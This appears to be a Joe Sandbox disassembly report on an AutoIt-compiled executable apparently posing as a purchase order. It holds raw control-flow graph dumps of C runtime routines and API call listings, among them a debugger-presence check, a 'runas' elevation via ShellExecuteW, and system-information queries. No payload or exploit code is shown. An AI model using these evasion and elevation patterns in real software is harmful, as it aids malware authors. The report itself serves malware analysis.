87070 41d57c InitializeCriticalSectionAndSpinCount 87069->87070 87072 41d59c 87070->87072 87073 41d5af 
EnterCriticalSection 87070->87073 87076 413748 _free 46 API calls 87072->87076 87073->87064 87074 418209 __mtinitlocknum 46 API calls 87074->87075 87075->87064 87075->87065 87075->87074 87106 4154b2 47 API calls __lock 87075->87106 87107 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87075->87107 87076->87064 87079 41d23a 87078->87079 87080 41d255 87079->87080 87091 41d26c __wopenfile 87079->87091 87112 417f77 46 API calls __getptd_noexit 87080->87112 87082 41d25a 87113 417f25 10 API calls wcstoxq 87082->87113 87083 41d47a 87117 417f77 46 API calls __getptd_noexit 87083->87117 87084 41d48c 87109 422bf9 87084->87109 87088 41d47f 87118 417f25 10 API calls wcstoxq 87088->87118 87089 41499d 87102 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87089->87102 87091->87083 87097 41d421 87091->87097 87114 41341f 58 API calls 2 library calls 87091->87114 87093 41d41a 87093->87097 87115 41341f 58 API calls 2 library calls 87093->87115 87095 41d439 87095->87097 87116 41341f 58 API calls 2 library calls 87095->87116 87097->87083 87097->87084 87098->87046 87099->87057 87100->87057 87101->87057 87102->87057 87108 4181f2 LeaveCriticalSection 87103->87108 87105 41d602 87105->87068 87106->87075 87107->87075 87108->87105 87119 422b35 87109->87119 87111 422c14 87111->87089 87112->87082 87113->87089 87114->87093 87115->87095 87116->87097 87117->87088 87118->87089 87121 422b41 __fcloseall 87119->87121 87120 422b54 87122 417f77 wcstoxq 46 API calls 87120->87122 87121->87120 87123 422b8a 87121->87123 87124 422b59 87122->87124 87125 422400 __tsopen_nolock 109 API calls 87123->87125 87126 417f25 wcstoxq 10 API calls 87124->87126 87127 422ba4 87125->87127 87129 422b63 __fcloseall 87126->87129 87128 422bcb __wsopen_helper LeaveCriticalSection 87127->87128 87128->87129 87129->87111 87133 4150dd __fcloseall 87130->87133 87131 4150e9 87161 417f77 46 API calls __getptd_noexit 87131->87161 87133->87131 87134 41510f 87133->87134 87143 415471 87134->87143 87136 4150ee 87162 
417f25 10 API calls wcstoxq 87136->87162 87142 4150f9 __fcloseall 87142->86991 87144 415483 87143->87144 87145 4154a5 EnterCriticalSection 87143->87145 87144->87145 87146 41548b 87144->87146 87147 415117 87145->87147 87148 4182cb __lock 46 API calls 87146->87148 87149 415047 87147->87149 87148->87147 87150 415067 87149->87150 87151 415057 87149->87151 87156 415079 87150->87156 87164 414e4e 87150->87164 87219 417f77 46 API calls __getptd_noexit 87151->87219 87155 41505c 87163 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87155->87163 87181 41443c 87156->87181 87159 4150b9 87194 41e1f4 87159->87194 87161->87136 87162->87142 87163->87142 87165 414e61 87164->87165 87166 414e79 87164->87166 87220 417f77 46 API calls __getptd_noexit 87165->87220 87168 414139 __flswbuf 46 API calls 87166->87168 87170 414e80 87168->87170 87169 414e66 87221 417f25 10 API calls wcstoxq 87169->87221 87172 41e1f4 __write 51 API calls 87170->87172 87173 414e97 87172->87173 87174 414f09 87173->87174 87176 414ec9 87173->87176 87180 414e71 87173->87180 87222 417f77 46 API calls __getptd_noexit 87174->87222 87177 41e1f4 __write 51 API calls 87176->87177 87176->87180 87178 414f64 87177->87178 87179 41e1f4 __write 51 API calls 87178->87179 87178->87180 87179->87180 87180->87156 87182 414477 87181->87182 87183 414455 87181->87183 87187 414139 87182->87187 87183->87182 87184 414139 __flswbuf 46 API calls 87183->87184 87185 414470 87184->87185 87223 41b7b2 77 API calls 6 library calls 87185->87223 87188 414145 87187->87188 87189 41415a 87187->87189 87224 417f77 46 API calls __getptd_noexit 87188->87224 87189->87159 87191 41414a 87225 417f25 10 API calls wcstoxq 87191->87225 87193 414155 87193->87159 87195 41e200 __fcloseall 87194->87195 87196 41e223 87195->87196 87197 41e208 87195->87197 87199 41e22f 87196->87199 87203 41e269 87196->87203 87246 417f8a 46 API calls __getptd_noexit 87197->87246 87248 417f8a 46 API calls __getptd_noexit 87199->87248 87200 41e20d 87247 417f77 46 API calls 
__getptd_noexit 87200->87247 87202 41e234 87249 417f77 46 API calls __getptd_noexit 87202->87249 87226 41ae56 87203->87226 87207 41e23c 87250 417f25 10 API calls wcstoxq 87207->87250 87208 41e26f 87210 41e291 87208->87210 87211 41e27d 87208->87211 87251 417f77 46 API calls __getptd_noexit 87210->87251 87236 41e17f 87211->87236 87212 41e215 __fcloseall 87212->87155 87215 41e289 87253 41e2c0 LeaveCriticalSection __unlock_fhandle 87215->87253 87216 41e296 87252 417f8a 46 API calls __getptd_noexit 87216->87252 87219->87155 87220->87169 87221->87180 87222->87180 87223->87182 87224->87191 87225->87193 87227 41ae62 __fcloseall 87226->87227 87228 41aebc 87227->87228 87231 4182cb __lock 46 API calls 87227->87231 87229 41aec1 EnterCriticalSection 87228->87229 87230 41aede __fcloseall 87228->87230 87229->87230 87230->87208 87232 41ae8e 87231->87232 87233 41ae97 InitializeCriticalSectionAndSpinCount 87232->87233 87234 41aeaa 87232->87234 87233->87234 87235 41aeec ___lock_fhandle LeaveCriticalSection 87234->87235 87235->87228 87237 41aded __lseek_nolock 46 API calls 87236->87237 87238 41e18e 87237->87238 87239 41e1a4 SetFilePointer 87238->87239 87240 41e194 87238->87240 87242 41e1c3 87239->87242 87243 41e1bb GetLastError 87239->87243 87241 417f77 wcstoxq 46 API calls 87240->87241 87244 41e199 87241->87244 87242->87244 87245 417f9d __dosmaperr 46 API calls 87242->87245 87243->87242 87244->87215 87245->87244 87246->87200 87247->87212 87248->87202 87249->87207 87250->87212 87251->87216 87252->87215 87253->87212 87255 4149ea 87254->87255 87256 4149fe 87254->87256 87300 417f77 46 API calls __getptd_noexit 87255->87300 87257 4149fa 87256->87257 87259 41443c __flush 77 API calls 87256->87259 87272 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87257->87272 87261 414a0a 87259->87261 87260 4149ef 87301 417f25 10 API calls wcstoxq 87260->87301 87273 41d8c2 87261->87273 87265 414139 __flswbuf 46 API calls 87266 414a18 87265->87266 87277 41d7fe 87266->87277 87268 414a1e 
87268->87257 87269 413748 _free 46 API calls 87268->87269 87269->87257 87270->87001 87271->87005 87272->87005 87274 41d8d2 87273->87274 87276 414a12 87273->87276 87275 413748 _free 46 API calls 87274->87275 87274->87276 87275->87276 87276->87265 87278 41d80a __fcloseall 87277->87278 87279 41d812 87278->87279 87280 41d82d 87278->87280 87317 417f8a 46 API calls __getptd_noexit 87279->87317 87281 41d839 87280->87281 87286 41d873 87280->87286 87319 417f8a 46 API calls __getptd_noexit 87281->87319 87284 41d817 87318 417f77 46 API calls __getptd_noexit 87284->87318 87285 41d83e 87320 417f77 46 API calls __getptd_noexit 87285->87320 87289 41ae56 ___lock_fhandle 48 API calls 87286->87289 87291 41d879 87289->87291 87290 41d846 87321 417f25 10 API calls wcstoxq 87290->87321 87293 41d893 87291->87293 87294 41d887 87291->87294 87322 417f77 46 API calls __getptd_noexit 87293->87322 87302 41d762 87294->87302 87297 41d88d 87323 41d8ba LeaveCriticalSection __unlock_fhandle 87297->87323 87298 41d81f __fcloseall 87298->87268 87300->87260 87301->87257 87324 41aded 87302->87324 87304 41d7c8 87337 41ad67 47 API calls 2 library calls 87304->87337 87306 41d772 87306->87304 87307 41d7a6 87306->87307 87309 41aded __lseek_nolock 46 API calls 87306->87309 87307->87304 87310 41aded __lseek_nolock 46 API calls 87307->87310 87308 41d7d0 87312 41d7f2 87308->87312 87338 417f9d 46 API calls 3 library calls 87308->87338 87313 41d79d 87309->87313 87311 41d7b2 CloseHandle 87310->87311 87311->87304 87314 41d7be GetLastError 87311->87314 87312->87297 87316 41aded __lseek_nolock 46 API calls 87313->87316 87314->87304 87316->87307 87317->87284 87318->87298 87319->87285 87320->87290 87321->87298 87322->87297 87323->87298 87325 41ae12 87324->87325 87326 41adfa 87324->87326 87328 417f8a __close 46 API calls 87325->87328 87331 41ae51 87325->87331 87327 417f8a __close 46 API calls 87326->87327 87329 41adff 87327->87329 87330 41ae23 87328->87330 87332 417f77 wcstoxq 46 API calls 87329->87332 87333 417f77 
wcstoxq 46 API calls 87330->87333 87331->87306 87334 41ae07 87332->87334 87335 41ae2b 87333->87335 87334->87306 87336 417f25 wcstoxq 10 API calls 87335->87336 87336->87334 87337->87308 87338->87312 87340 414c82 __fcloseall 87339->87340 87341 414cc3 87340->87341 87342 414c96 __crtGetStringTypeA_stat 87340->87342 87343 414cbb __fcloseall 87340->87343 87344 415471 __lock_file 47 API calls 87341->87344 87366 417f77 46 API calls __getptd_noexit 87342->87366 87343->87010 87346 414ccb 87344->87346 87352 414aba 87346->87352 87348 414cb0 87367 417f25 10 API calls wcstoxq 87348->87367 87356 414ad8 __crtGetStringTypeA_stat 87352->87356 87359 414af2 87352->87359 87353 414ae2 87419 417f77 46 API calls __getptd_noexit 87353->87419 87355 414b2d 87355->87359 87360 414c38 __crtGetStringTypeA_stat 87355->87360 87361 414139 __flswbuf 46 API calls 87355->87361 87369 41dfcc 87355->87369 87399 41d8f3 87355->87399 87421 41e0c2 46 API calls 3 library calls 87355->87421 87356->87353 87356->87355 87356->87359 87368 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87359->87368 87422 417f77 46 API calls __getptd_noexit 87360->87422 87361->87355 87365 414ae7 87420 417f25 10 API calls wcstoxq 87365->87420 87366->87348 87367->87343 87368->87343 87370 41dfd8 __fcloseall 87369->87370 87371 41dfe0 87370->87371 87372 41dffb 87370->87372 87492 417f8a 46 API calls __getptd_noexit 87371->87492 87374 41e007 87372->87374 87377 41e041 87372->87377 87494 417f8a 46 API calls __getptd_noexit 87374->87494 87375 41dfe5 87493 417f77 46 API calls __getptd_noexit 87375->87493 87380 41e063 87377->87380 87381 41e04e 87377->87381 87379 41e00c 87495 417f77 46 API calls __getptd_noexit 87379->87495 87384 41ae56 ___lock_fhandle 48 API calls 87380->87384 87497 417f8a 46 API calls __getptd_noexit 87381->87497 87387 41e069 87384->87387 87385 41e014 87496 417f25 10 API calls wcstoxq 87385->87496 87386 41e053 87498 417f77 46 API calls __getptd_noexit 87386->87498 87390 41e077 87387->87390 87391 41e08b 87387->87391 
87389 41dfed __fcloseall 87389->87355 87423 41da15 87390->87423 87499 417f77 46 API calls __getptd_noexit 87391->87499 87395 41e090 87500 417f8a 46 API calls __getptd_noexit 87395->87500 87396 41e083 87501 41e0ba LeaveCriticalSection __unlock_fhandle 87396->87501 87400 41d900 87399->87400 87403 41d915 87399->87403 87505 417f77 46 API calls __getptd_noexit 87400->87505 87402 41d905 87506 417f25 10 API calls wcstoxq 87402->87506 87405 41d94a 87403->87405 87410 41d910 87403->87410 87502 420603 87403->87502 87407 414139 __flswbuf 46 API calls 87405->87407 87408 41d95e 87407->87408 87409 41dfcc __read 59 API calls 87408->87409 87411 41d965 87409->87411 87410->87355 87411->87410 87412 414139 __flswbuf 46 API calls 87411->87412 87413 41d988 87412->87413 87413->87410 87414 414139 __flswbuf 46 API calls 87413->87414 87415 41d994 87414->87415 87415->87410 87416 414139 __flswbuf 46 API calls 87415->87416 87417 41d9a1 87416->87417 87418 414139 __flswbuf 46 API calls 87417->87418 87418->87410 87419->87365 87420->87359 87421->87355 87422->87365 87424 41da31 87423->87424 87425 41da4c 87423->87425 87427 417f8a __close 46 API calls 87424->87427 87426 41da5b 87425->87426 87428 41da7a 87425->87428 87429 417f8a __close 46 API calls 87426->87429 87430 41da36 87427->87430 87432 41da98 87428->87432 87443 41daac 87428->87443 87431 41da60 87429->87431 87433 417f77 wcstoxq 46 API calls 87430->87433 87434 417f77 wcstoxq 46 API calls 87431->87434 87435 417f8a __close 46 API calls 87432->87435 87444 41da3e 87433->87444 87437 41da67 87434->87437 87439 41da9d 87435->87439 87436 41db02 87438 417f8a __close 46 API calls 87436->87438 87440 417f25 wcstoxq 10 API calls 87437->87440 87441 41db07 87438->87441 87442 417f77 wcstoxq 46 API calls 87439->87442 87440->87444 87445 417f77 wcstoxq 46 API calls 87441->87445 87446 41daa4 87442->87446 87443->87436 87443->87444 87447 41dae1 87443->87447 87448 41db1b 87443->87448 87444->87396 87445->87446 87449 417f25 wcstoxq 10 API calls 87446->87449 87447->87436 
87452 41daec ReadFile 87447->87452 87450 416b04 __malloc_crt 46 API calls 87448->87450 87449->87444 87453 41db31 87450->87453 87454 41dc17 87452->87454 87455 41df8f GetLastError 87452->87455 87458 41db59 87453->87458 87459 41db3b 87453->87459 87454->87455 87462 41dc2b 87454->87462 87456 41de16 87455->87456 87457 41df9c 87455->87457 87466 417f9d __dosmaperr 46 API calls 87456->87466 87471 41dd9b 87456->87471 87460 417f77 wcstoxq 46 API calls 87457->87460 87463 420494 __lseeki64_nolock 48 API calls 87458->87463 87461 417f77 wcstoxq 46 API calls 87459->87461 87464 41dfa1 87460->87464 87465 41db40 87461->87465 87462->87471 87472 41dc47 87462->87472 87475 41de5b 87462->87475 87467 41db67 87463->87467 87468 417f8a __close 46 API calls 87464->87468 87469 417f8a __close 46 API calls 87465->87469 87466->87471 87467->87452 87468->87471 87469->87444 87470 413748 _free 46 API calls 87470->87444 87471->87444 87471->87470 87473 41dcab ReadFile 87472->87473 87480 41dd28 87472->87480 87477 41dcc9 GetLastError 87473->87477 87483 41dcd3 87473->87483 87474 41ded0 ReadFile 87478 41deef GetLastError 87474->87478 87484 41def9 87474->87484 87475->87471 87475->87474 87476 41ddec MultiByteToWideChar 87476->87471 87479 41de10 GetLastError 87476->87479 87477->87472 87477->87483 87478->87475 87478->87484 87479->87456 87480->87471 87481 41dda3 87480->87481 87482 41dd96 87480->87482 87488 41dd60 87480->87488 87481->87488 87489 41ddda 87481->87489 87485 417f77 wcstoxq 46 API calls 87482->87485 87483->87472 87486 420494 __lseeki64_nolock 48 API calls 87483->87486 87484->87475 87487 420494 __lseeki64_nolock 48 API calls 87484->87487 87485->87471 87486->87483 87487->87484 87488->87476 87490 420494 __lseeki64_nolock 48 API calls 87489->87490 87491 41dde9 87490->87491 87491->87476 87492->87375 87493->87389 87494->87379 87495->87385 87496->87389 87497->87386 87498->87385 87499->87395 87500->87396 87501->87389 87503 416b04 __malloc_crt 46 API calls 87502->87503 87504 420618 87503->87504 87504->87405 
87505->87402 87506->87410 87510 4148b3 GetSystemTimeAsFileTime __aulldiv 87507->87510 87509 442c6b 87509->87013 87510->87509 87511->87020 87512->87026 87513->87026 87519 45272f __tzset_nolock _wcscpy 87514->87519 87515 414d04 61 API calls __fread_nolock 87515->87519 87516 44afef GetSystemTimeAsFileTime 87516->87519 87517 4528a4 87517->86935 87517->86936 87518 4150d1 81 API calls _fseek 87518->87519 87519->87515 87519->87516 87519->87517 87519->87518 87521 44b1bc 87520->87521 87522 44b1ca 87520->87522 87523 4149c2 116 API calls 87521->87523 87524 44b1e1 87522->87524 87525 4149c2 116 API calls 87522->87525 87526 44b1d8 87522->87526 87523->87522 87555 4321a4 87524->87555 87527 44b2db 87525->87527 87526->86962 87527->87524 87529 44b2e9 87527->87529 87531 44b2f6 87529->87531 87535 414a46 __fcloseall 82 API calls 87529->87535 87530 44b224 87532 44b253 87530->87532 87533 44b228 87530->87533 87531->86962 87559 43213d 87532->87559 87534 44b235 87533->87534 87537 414a46 __fcloseall 82 API calls 87533->87537 87538 44b245 87534->87538 87540 414a46 __fcloseall 82 API calls 87534->87540 87535->87531 87537->87534 87538->86962 87539 44b25a 87541 44b260 87539->87541 87542 44b289 87539->87542 87540->87538 87545 414a46 __fcloseall 82 API calls 87541->87545 87548 44b26d 87541->87548 87569 44b0bf 87 API calls 87542->87569 87544 44b28f 87570 4320f8 46 API calls _free 87544->87570 87545->87548 87546 414a46 __fcloseall 82 API calls 87549 44b27d 87546->87549 87548->87546 87548->87549 87549->86962 87550 44b295 87551 44b2a2 87550->87551 87552 414a46 __fcloseall 82 API calls 87550->87552 87553 44b2b2 87551->87553 87554 414a46 __fcloseall 82 API calls 87551->87554 87552->87551 87553->86962 87554->87553 87556 4321cb 87555->87556 87558 4321b4 __tzset_nolock _memmove 87555->87558 87557 414d04 __fread_nolock 61 API calls 87556->87557 87557->87558 87558->87530 87560 4135bb _malloc 46 API calls 87559->87560 87561 432150 87560->87561 87562 4135bb _malloc 46 API calls 87561->87562 87563 432162 
87562->87563 87564 4135bb _malloc 46 API calls 87563->87564 87565 432174 87564->87565 87567 432189 87565->87567 87571 4320f8 46 API calls _free 87565->87571 87567->87539 87568 432198 87568->87539 87569->87544 87570->87550 87571->87568 87572->86866 87573->86868 87574->86886 87575->86886 87576->86886 87577->86881 87578->86886 87579->86886 87580->86891 87581->86899 87582->86901 87583->86901 87633 410160 87584->87633 87586 41012f GetFullPathNameW 87587 410147 moneypunct 87586->87587 87587->86720 87589 4102cb SHGetDesktopFolder 87588->87589 87592 410333 _wcsncpy 87588->87592 87590 4102e0 _wcsncpy 87589->87590 87589->87592 87591 41031c SHGetPathFromIDListW 87590->87591 87590->87592 87591->87592 87592->86723 87594 4101bb 87593->87594 87598 425f4a 87593->87598 87595 410160 52 API calls 87594->87595 87597 4101c7 87595->87597 87596 4114ab __wcsicoll 58 API calls 87596->87598 87637 410200 52 API calls 2 library calls 87597->87637 87598->87596 87601 425f6e 87598->87601 87600 4101d6 87638 410200 52 API calls 2 library calls 87600->87638 87601->86725 87603 4101e9 87603->86725 87605 40f760 128 API calls 87604->87605 87606 40f584 87605->87606 87607 429335 87606->87607 87608 40f58c 87606->87608 87611 4528bd 118 API calls 87607->87611 87609 40f598 87608->87609 87610 429358 87608->87610 87656 4033c0 113 API calls 7 library calls 87609->87656 87657 434034 86 API calls _wprintf 87610->87657 87613 42934b 87611->87613 87616 429373 87613->87616 87617 42934f 87613->87617 87615 40f5b4 87615->86721 87619 4115d7 52 API calls 87616->87619 87620 431e58 82 API calls 87617->87620 87618 429369 87618->87616 87632 4293c5 moneypunct 87619->87632 87620->87610 87621 42959c 87622 413748 _free 46 API calls 87621->87622 87623 4295a5 87622->87623 87624 431e58 82 API calls 87623->87624 87625 4295b1 87624->87625 87629 401b10 52 API calls 87629->87632 87632->87621 87632->87629 87639 444af8 87632->87639 87642 402780 87632->87642 87650 4022d0 87632->87650 87658 44c7dd 64 API calls 3 library calls 87632->87658 
87659 44b41c 52 API calls 87632->87659 87634 410167 _wcslen 87633->87634 87635 4115d7 52 API calls 87634->87635 87636 41017e _wcscpy 87635->87636 87636->87586 87637->87600 87638->87603 87640 4115d7 52 API calls 87639->87640 87641 444b27 _memmove 87640->87641 87641->87632 87643 402790 moneypunct _memmove 87642->87643 87644 402827 87642->87644 87645 4115d7 52 API calls 87643->87645 87646 4115d7 52 API calls 87644->87646 87647 402797 87645->87647 87646->87643 87648 4115d7 52 API calls 87647->87648 87649 4027bd 87647->87649 87648->87649 87649->87632 87651 4022e0 87650->87651 87653 40239d 87650->87653 87652 4115d7 52 API calls 87651->87652 87651->87653 87654 402320 moneypunct 87651->87654 87652->87654 87653->87632 87654->87653 87655 4115d7 52 API calls 87654->87655 87655->87654 87656->87615 87657->87618 87658->87632 87659->87632 87661 402417 87660->87661 87666 402539 moneypunct 87660->87666 87662 4115d7 52 API calls 87661->87662 87661->87666 87663 402443 87662->87663 87664 4115d7 52 API calls 87663->87664 87667 4024b4 87664->87667 87666->86729 87667->87666 87668 4022d0 52 API calls 87667->87668 87689 402880 87667->87689 87668->87667 87673 401566 87669->87673 87670 401794 87741 40e9a0 90 API calls 87670->87741 87672 40167a 87676 4017c0 87672->87676 87742 45e737 90 API calls 3 library calls 87672->87742 87673->87670 87673->87672 87675 4010a0 52 API calls 87673->87675 87675->87673 87676->86731 87678 40bc70 52 API calls 87677->87678 87687 40d451 87678->87687 87679 40d50f 87745 410600 52 API calls 87679->87745 87681 427c01 87746 45e737 90 API calls 3 library calls 87681->87746 87682 40e0a0 52 API calls 87682->87687 87684 401b10 52 API calls 87684->87687 87685 40d519 87685->86734 87687->87679 87687->87681 87687->87682 87687->87684 87687->87685 87743 40f310 53 API calls 87687->87743 87744 40d860 91 API calls 87687->87744 87690 4115d7 52 API calls 87689->87690 87691 4028b3 87690->87691 87692 4115d7 52 API calls 87691->87692 87713 4028c5 moneypunct _memmove 87692->87713 87693 
[Control-flow graph node/edge data from the interactive graph viewer not reproduced. Names referenced in the graph nodes: CharUpperBuffW, InterlockedIncrement, InterlockedDecrement, Sleep, VariantInit, VariantCopy, VariantClear, FindFirstFileW, FindClose, GetFileAttributesW, GetLastError, CloseHandle, CreateFileW, ReadFile, WriteFile, SetFilePointerEx, VirtualAlloc, VirtualProtect, VirtualFree, GetCurrentProcess, TerminateProcess, ExitProcess, CreateThread, GetStdHandle, GetVersionExW, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetPEB; library calls __wsplitpath, __wcsicoll, __itow_s, __write_nolock, __cinit, _wcslen, _wcscpy, _strcat, _malloc, _memmove, moneypunct.]

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                  • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                  Strings
                                                                  • runas, xrefs: 0042E2AD, 0042E2DC
                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                  • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                  • API String ID: 2495805114-3383388033
                                                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  [Control-flow graph node/edge data for the function at 0040E500 (basic blocks 40e500-40e65d and 427616-4276df) from the interactive graph viewer not reproduced. APIs referenced in the graph nodes: GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, FreeLibrary.]
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                  • String ID: 0SH$#v
                                                                  • API String ID: 3363477735-2448020801
                                                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                  APIs
                                                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: IsThemeActive$uxtheme.dll
                                                                  • API String ID: 2574300362-3542929980
                                                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                  Similarity
                                                                  • API ID: FreeInfoLibraryParametersSystem
                                                                  • String ID: #v
                                                                  • API String ID: 3403648963-554117064
                                                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
